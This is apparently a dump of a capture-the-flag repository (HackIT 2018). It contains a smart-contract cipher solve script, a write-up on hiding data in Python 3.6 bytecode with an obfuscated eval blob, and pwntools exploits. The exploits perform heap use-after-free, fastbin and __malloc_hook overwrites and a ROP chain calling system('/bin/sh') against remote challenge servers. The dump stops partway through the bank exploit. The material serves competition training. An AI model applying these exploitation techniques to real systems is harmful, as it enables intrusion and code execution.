[{"constant":true,"inputs":[{"name":"text","type":"string"}],"name":"Decrypt","outputs":[{"name":"","type":"bytes32"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"message","type":"bytes"}],"name":"laala","outputs":[{"name":"ret","type":"bytes20"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_seed","type":"string"}],"name":"setseed","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"feed","type":"bytes"}],"name":"aXeJ","outputs":[{"name":"","type":"bytes"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"x","type":"bytes20"}],"name":"bytes20ToString","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs
":[{"name":"text","type":"string"}],"name":"zMx","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"text","type":"string"}],"name":"Crp","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"source","type":"string"}],"name":"stringToBytes","outputs":[{"name":"result","type":"bytes"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"}]); -------------------------------------------------------------------------------- /misc/Smartpher/solution/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ''' 3 | Implemented by Aaditya Purani (@aaditya_purani) 4 | There are three functions calling each both are encryption routine. 5 | First function has in-memory array written in inline assembly 6 | In zMx function, it takes plain-text as input checks block.number == 12 7 | Encryption routine in zMx utilizes it and performs calculation along with memory arr 8 | Output is passed to Crp function, which has custom rot-19 implementation 9 | then it is feeded into aXeJ which takes input as bytes and perform require check with seed owner sets 10 | As this is static bytecode, seed cannot be retrieved from bytecode. 
So we want players to brute seed given sha1 hash & requirements 11 | seed should be exactly 4 length which is given out in one require(bytes(seed).length == 4); checks 12 | Then implement xor checks for aXeJ function 13 | Now, to decrypt implement in reverse given below 14 | ''' 15 | cipher = "tphzqh}v}uivyznwju" # Provided in message.txt 16 | len_cipher = len(cipher) 17 | offset = len_cipher - 2 18 | cipher = list(cipher) 19 | seed = "bcmz" # Must be retrieved by bruteforce of SHA-1 Hash provided in bytecode 4d64752cadde6ea019757e09ce374aa1bdba81df 20 | cipher[offset] = chr(ord(seed[0]) ^ ord(cipher[offset])^ ord(cipher[offset-2])) 21 | cipher[offset-4] = chr(ord(seed[2]) ^ ord(cipher[offset-4]) ^ ord(cipher[offset-8])) 22 | arr_num = [2, 24, 13, 17,8, 9, 10, 5, 3, 7] # Must be retrieved carefully from memory array 23 | blk_num = 12 24 | for i in xrange(0, len_cipher): 25 | cipher[i] = chr((ord(cipher[i])^arr_num[(i+3)%10])^(12)) 26 | print "".join(cipher) 27 | 28 | # Use the rotcustom.sol to decrypt it further -------------------------------------------------------------------------------- /misc/TrapOSaur/README.md: -------------------------------------------------------------------------------- 1 | # Trap-O-Saur 2 | 3 | Python 3.6 bytecode is given. Most likely players will try to reverse-engineer (RE) the bytecode. After successfully decompiling it to Python with uncompyle6, players will try to deobfuscate the code. 
4 | A critical section after unobfuscation 5 | 6 | ``` 7 | eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+str((+all([[]])))+')')+'e'+eval('str(eval)[eval(str((+all([])))+str((+all([[]]))))]')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str
(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval('str(eval)[eval(str((+all([])))+str((+all([[]]))))]')+'('+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((all([])+all([])))+str((+all([[]])))+')')+')'+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+
all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[e
val(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((all([])+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])+all([])+all([])))+str((+all([])))+')')+'['+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'s'+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+a
ll([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t'+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'e'+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all(
[])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+str((all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval('str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+']'+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(e
val)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')') 8 | ``` 9 | 10 | This is basically a pyfuck version of 11 | ``` 12 | \n\ndef f(x):\n x=['s','t','e','g','o']\n\n 13 | ``` 14 | 15 | There is a roulette function as well, but it is useless. As mentioned in the CTF, all flag formats are 'intact' unless otherwise mentioned in the description. 16 | Hence, players should not try `flag{stego}` or `stego`; it will give a wrong answer, as expected. But stego is the hint to proceed further. 17 | 18 | Python 3.6 bytecode has a peculiarity which can be abused to hide extra bytes in it without anyone noticing. In Python <= 3.5, instructions in the bytecode occupied either 1 or 3 bytes, depending on whether the opcode took an argument or not. In Python 3.6 this was changed so that all instructions occupy two bytes, so an opcode that takes no argument still carries an argument byte that the interpreter ignores. 19 | 20 | Hence, we figure out how many extra bytes could be added in our pyc. There is also an implicit hint in the challenge name `TrapOSaur`, which points to a tool known as `StegoSaurus` 21 | 22 | https://bitbucket.org/jherron/stegosaurus/overview 23 | 24 | After utilizing it, players will receive their hard earned flag : `flag{5t3g0_ftw}` 25 | 26 | We expect players to dig into the differences between Python versions. The difference is very minor, but this challenge has huge relevance in *real world scenarios*, as any Malware can basically hide shellcode inside a pyc file & extract it. 
Hence the description: either you use your hard-earned leet skills indefinitely to reverse, or you think deep ;) Because a decompiler does not show those ignored argument bytes, a clean-looking decompilation says nothing about them; recompiling the source with the same Python version and comparing the code bytes is one way to spot a modified pyc. 27 | -------------------------------------------------------------------------------- /misc/TrapOSaur/misc03.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/misc/TrapOSaur/misc03.pyc -------------------------------------------------------------------------------- /misc/TrapOSaur/solution/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/misc/TrapOSaur/solution/README.md -------------------------------------------------------------------------------- /pwn/A Heap Interface/README.md: -------------------------------------------------------------------------------- 1 | 1. Simple UAF exists. 2 | 3 | 2. The ptr at index=0 can be leaked when printing name. 4 | 5 | 3. Goal is to make malloc return a libc pointer at index=0. 6 | 7 | 4. Overwrite global_max_fast using unsorted bin attack (4 bit partial overwrite). 8 | 9 | 5. Create fastbin chain of size 0x200 and get allocation near mp_struct. 10 | 11 | 6. Leak libc 12 | 13 | 7. Determine 5th byte of libc address of \_\_malloc\_hook . 6th byte is assumed to be 0x7f. 14 | 15 | 8. Do fastbin attack near \_\_malloc\_hook with that size. 
16 | -------------------------------------------------------------------------------- /pwn/A Heap Interface/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | from base64 import b64encode, b64decode 4 | from itertools import product 5 | 6 | p = remote("185.168.131.133",6000) 7 | #p = process("./chall1",env={"LD_PRELOAD":"./libc-2.24.so"}) 8 | #raw_input() 9 | 10 | def menu(): 11 | p.recvuntil("3. 
Free",timeout=8) 12 | 13 | def create(size,idx): 14 | menu() 15 | p.sendline("1") 16 | p.recvuntil(":") 17 | p.sendline(str(size)) 18 | p.recvuntil(":",timeout=8) 19 | p.sendline(str(idx)) 20 | 21 | def free(idx): 22 | menu() 23 | p.sendline("3") 24 | p.recvuntil(":") 25 | p.sendline(str(idx)) 26 | 27 | def edit(idx,data): 28 | menu() 29 | p.sendline("2") 30 | p.recvuntil(":") 31 | p.sendline(str(idx)) 32 | sleep(0.1) 33 | p.send(data) 34 | 35 | def hack(n,size,libc): 36 | target = libc + 0x397acc 37 | free(n) 38 | buf = p64(target) 39 | edit(n,buf) 40 | 41 | create(size,8) 42 | #raw_input() 43 | create(size,8) 44 | 45 | magic = libc + 0xd694f 46 | #magic = libc + 0x3f35a 47 | 48 | finale = "X"*20 49 | finale += p64(magic) 50 | edit(8,finale) 51 | 52 | create(size,8) 53 | 54 | p.interactive() 55 | 56 | def pow_solve(): 57 | postfix, sha = re.findall("SHA256\(XXXX \+ (.+)\) == (.+)", p.recvline()[:-1])[0] 58 | 59 | print postfix 60 | print sha 61 | sha = sha.replace('\r','') 62 | l = product(string.ascii_letters + string.digits, repeat=4) 63 | for XXXX in l: 64 | XXXX = "".join(XXXX) 65 | if sha256sumhex(XXXX + postfix) == sha: 66 | log.success("pow = " + XXXX) 67 | break 68 | p.sendlineafter("Give me XXXX:", XXXX) 69 | 70 | #pow_solve() 71 | name = "A"*32 72 | p.recvuntil(":") 73 | p.sendline(name) 74 | 75 | create(222,0) # 0 76 | create(0x1f0,1) # 1 77 | create(0x1f0,2) # 2 78 | create(0x7fc0,3) # 3 79 | create(0x7fb0,9) # 3 80 | create(0x7fa0,10) # 3 81 | create(0x7f90,11) # 3 82 | create(0x7f80,12) # 3 83 | create(0x7f70,13) # 3 84 | create(0x7f60,14) # 3 85 | create(0x7f50,15) # 3 86 | create(0x7f40,16) # 3 87 | create(0x7f30,17) # 3 88 | create(0x7f20,18) # 3 89 | free(0) 90 | 91 | global_max = 0x7ffff7dd57cc 92 | mp_target = 0x7ffff7dd3169 93 | lol = "A"*8 94 | # global_max_fast. 95 | lol += "\xc0\x57"; 96 | 97 | edit(0,lol) 98 | create(222,4) # 4 99 | 100 | ''' 101 | Unsorted bin attack on global_max_fast 102 | 0x200 fastbin attack on mp_ . 
As soon as address allocated, we get libc leak. 103 | 0x7fff fastbin attack on __malloc_hook. 104 | ''' 105 | 106 | free(1) 107 | # mp_ struct. 108 | lol = "\x69\x31" 109 | edit(1,lol) 110 | 111 | create(0x1f0,5) # 5 112 | create(0x1f0,0) # 6 113 | 114 | #buf = "X"*16 115 | #edit(6,buf) 116 | 117 | menu() 118 | p.sendline("4") 119 | p.recvuntil("Name:") 120 | p.recv(33) 121 | libc = p.recv(6).ljust(8,"\x00") 122 | libc = u64(libc) - 0x397179 123 | log.success("Libc: " + hex(libc)) 124 | raw_input() 125 | 126 | target = libc + 0x397acc 127 | 128 | mask = (target & 0xffff00000000)/0x100000000 129 | print hex(mask) 130 | #raw_input() 131 | idx_f = 3 132 | if(mask >= 0x7f30 and mask < 0x7f40): 133 | hack(18,0x7f20,libc) 134 | if(mask >= 0x7f40 and mask < 0x7f50): 135 | hack(17,0x7f30,libc) 136 | if(mask >= 0x7f50 and mask < 0x7f60): 137 | hack(16,0x7f40,libc) 138 | if(mask >= 0x7f60 and mask < 0x7f70): 139 | hack(15,0x7f50,libc) 140 | if(mask >= 0x7f70 and mask < 0x7f80): 141 | hack(14,0x7f60,libc) 142 | if(mask >= 0x7f80 and mask < 0x7f90): 143 | hack(13,0x7f70,libc) 144 | if(mask >= 0x7f90 and mask < 0x7fa0): 145 | hack(12,0x7f80,libc) 146 | if(mask >= 0x7fa0 and mask < 0x7fb0): 147 | hack(11,0x7f90,libc) 148 | if(mask >= 0x7fb0 and mask < 0x7fc0): 149 | hack(10,0x7fa0,libc) 150 | if(mask >= 0x7fc0 and mask < 0x7fd0): 151 | hack(9,0x7fb0,libc) 152 | if(mask >= 0x7fd0 and mask < 0x7fe0): 153 | hack(3,0x7fc0,libc) 154 | else: 155 | log.failure("Error mask not found") 156 | p.close() 157 | -------------------------------------------------------------------------------- /pwn/A Heap Interface/heap_interface: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/pwn/A Heap Interface/heap_interface -------------------------------------------------------------------------------- /pwn/Army/README.md: 
-------------------------------------------------------------------------------- 1 | 1. Global variable is used in alloca call. Make malloc call fail by putting negative size -1, program will simply return but not exit. 2 | 2. The global variable gets set however. 3 | 3. Overflow in promote() 4 | -------------------------------------------------------------------------------- /pwn/Army/army: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/pwn/Army/army -------------------------------------------------------------------------------- /pwn/Army/exploit_army.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | 4 | p = remote("185.168.131.122", 6000) 5 | #p = process("./final") 6 | raw_input() 7 | 8 | def menu(): 9 | p.recvuntil("a promotion") 10 | 11 | def soldier(name,size,desc,fl): 12 | menu() 13 | p.sendline("1") 14 | p.recvuntil("name:") 15 | p.sendline(name) 16 | p.recvuntil("height:") 17 | p.sendline("33") 18 | p.recvuntil("weight:") 19 | p.sendline("33") 20 | p.recvuntil("answer") 21 | p.sendline(str(size)) 22 | if fl == 6: 23 | p.recvuntil("description:") 24 | p.sendline(desc) 25 | else: 26 | pass 27 | 28 | def promote(reason): 29 | menu() 30 | p.sendline("3") 31 | p.recvuntil("answer :") 32 | p.sendline(reason) 33 | 34 | p.recvuntil("Luck : ") 35 | leak = p.recvline().strip("\n") 36 | leak = leak + "\x00"*2 37 | leak = u64(leak) - 0x6f690 38 | log.success("Libc: " + hex(leak)) 39 | libc = leak 40 | 41 | buf = "A"*8 42 | soldier(buf,96,"BB",6) 43 | promote("K") 44 | 45 | pop_rdi = p64(0x0000000000400d03) 46 | sh_str = p64(libc + 0x18cd57) 47 | system = p64(libc + 0x45390) 48 | 49 | soldier(buf,-2,"CC",8) 50 | buf = "X"*56 51 | buf += pop_rdi 52 | buf += sh_str 53 | buf += system 54 | promote(buf) 55 | 56 | p.interactive() 57 | 
-------------------------------------------------------------------------------- /pwn/Bank reimplemented/README.md: -------------------------------------------------------------------------------- 1 | 1. Off by one allows us to change size. 2 | 3 | 2. Need to make sure to leak using the read() function , and not fgets(). 4 | 5 | 3. Leak .text, control array of heap_ptrs. 6 | 7 | 4. Perform fastbin attack near \_\_free\_hook - 0x1000, write ptr to address which contains the money check. 8 | 9 | 5. Make heap_ptr in .text point to \_\_free\_hook - 0x1000 so that the money check passes successfully. 10 | 11 | 6. Use edit, it will allow you to write unlimited bytes, and reach \_\_free\_hook. 12 | -------------------------------------------------------------------------------- /pwn/Bank reimplemented/chall2-bank: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/pwn/Bank reimplemented/chall2-bank -------------------------------------------------------------------------------- /pwn/Bank reimplemented/exploit_bank.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | 4 | p = remote("185.168.131.144",6000) 5 | #p = process("./chall2",env={"LD_PRELOAD":"./libc-2.24.so"}) 6 | raw_input() 7 | 8 | def menu(): 9 | p.recvuntil("5. 
View your bank status") 10 | 11 | def cr7(idx,new_t): 12 | menu() 13 | p.sendline("2") 14 | p.recvuntil("account:") 15 | p.sendline(str(idx)) 16 | sleep(0.2) 17 | p.send(new_t) 18 | 19 | def create(title,size,desc): 20 | menu() 21 | p.sendline("1") 22 | p.recvuntil("account:") 23 | p.sendline(title) 24 | p.recvuntil("statement:") 25 | p.sendline(str(size)) 26 | sleep(0.2) 27 | p.sendline(desc) 28 | 29 | def edit_title(idx,new_t): 30 | menu() 31 | p.sendline("2") 32 | p.recvuntil("account:") 33 | p.sendline(str(idx)) 34 | sleep(0.2) 35 | p.sendline(new_t) 36 | 37 | def edit_desc(idx,new_d): 38 | menu() 39 | p.sendline("3") 40 | p.recvuntil("account:") 41 | p.sendline(str(idx)) 42 | sleep(0.2) 43 | p.sendline(new_d) 44 | 45 | def show(idx): 46 | menu() 47 | p.sendline("5") 48 | p.recvuntil("account") 49 | p.sendline(str(idx)) 50 | 51 | def shutdown(idx): 52 | menu() 53 | p.sendline("4") 54 | p.recvuntil("account:") 55 | p.sendline(str(idx)) 56 | 57 | lol = "A"*8 58 | fake_chunk = p64(0x00) 59 | fake_chunk += p64(0x51) 60 | name = "B"*16 61 | name += fake_chunk 62 | name2 = "C"*8 63 | 64 | create(lol,12,name2) # 0 65 | create(lol,20,name2) 66 | shutdown(1) 67 | create(lol,38,"FFFFFFFF") # 1 68 | 69 | # Now overflow. 70 | lol = "A"*16 71 | lol += "\xb1" 72 | create(lol,12,name2) # 2 73 | create("HHHH",48,name) # 3 74 | create("HHHH",48,"LLLLLLL") # 4 75 | 76 | shutdown(1) 77 | 78 | # Now we have 0x71 chunk overflow into 3rd. 79 | 80 | buf = "X"*16 81 | buf += p64(0xffffffffff600000) 82 | buf += "\x00\x20" 83 | create("1234",4,"6") 84 | create("1234",80,buf) 85 | 86 | # Use payload to first leak and then finally attack. 
